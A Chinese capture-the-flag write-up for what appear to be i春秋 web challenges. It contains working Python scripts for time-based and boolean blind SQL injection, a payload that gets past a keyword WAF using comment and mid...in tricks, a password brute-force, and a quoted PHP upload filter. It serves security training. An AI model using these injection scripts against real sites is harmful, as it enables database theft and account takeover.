打开题目,显示登陆框,目录扫描发现有register.php,注册账号登陆什么都没有,就一个用户名。猜测可能是二次注入。 构造payload: ‘ or (case when 1=1 then ‘a’ else ‘b’ end)=’a,发现成功。 另外过滤了information,逗号。没有information,只能猜测表名为flag。然后结合limit offset写个脚本跑去试了。
# -*- coding:utf8 -*- import requests import time db_name="" url= "http://7f01519f2fe14923acb0d2a096255f7302bd502b499a47ed.game.ichunqiu.com/register.php" database="" ##当前数据库名长度## for a inrange(1,50): for i inrange(30,148): db_payload="' or (case when ascii(mid((select * from flag limit 1 offset 0)from(%d)for(1)))='%d' then sleep(3) else 'b' end)='a"%(a,i) da={"email":"11@qq.com", "username":db_payload, "password":"11"} print(db_payload) startTime=time.time() r=requests.post(url,data=da,timeout=100) if time.time()-startTime>2: database+=chr(i) print(database) break print(database)
if (!empty($_FILES['file'])) { #mime check if (!in_array($_FILES['file']['type'], ['image/jpeg', 'image/png', 'image/gif'])) { die('This type is not allowed!'); }
#check filename $file = empty($_POST['filename']) ? $_FILES['file']['name'] : $_POST['filename']; if (!is_array($file)) { $file = explode('.', strtolower($file)); } $ext = end($file); if (!in_array($ext, ['jpg', 'png', 'gif'])) { die('This file is not allowed!'); }
爆破admin admin123登陆显示only wuyanzu can get the flag 。 waf:/sleepbenchmark=likeregexpand\%substrunion\s+groupflooruserextractvalueUpdateXmlordlpadrpadleft>,ascii/i !!! (trust me,no one can bypass it)用户名错误会显示username error,否则显示passwd error。可以构造payload利用布尔盲注跑密码。
for a inrange(1,50): for i in st: db_payload="wuyanzu'/**/&&/**/mid(passwd/**/from/**/%d/**/for/**/1)in('%s')#"%(a,i) da={"uname":db_payload, "passwd":1, "submit":"login" } #print(db_payload) r=requests.post(url,data=da,timeout=100) if'passwd'in r.text: database+=i print(database) break print(database)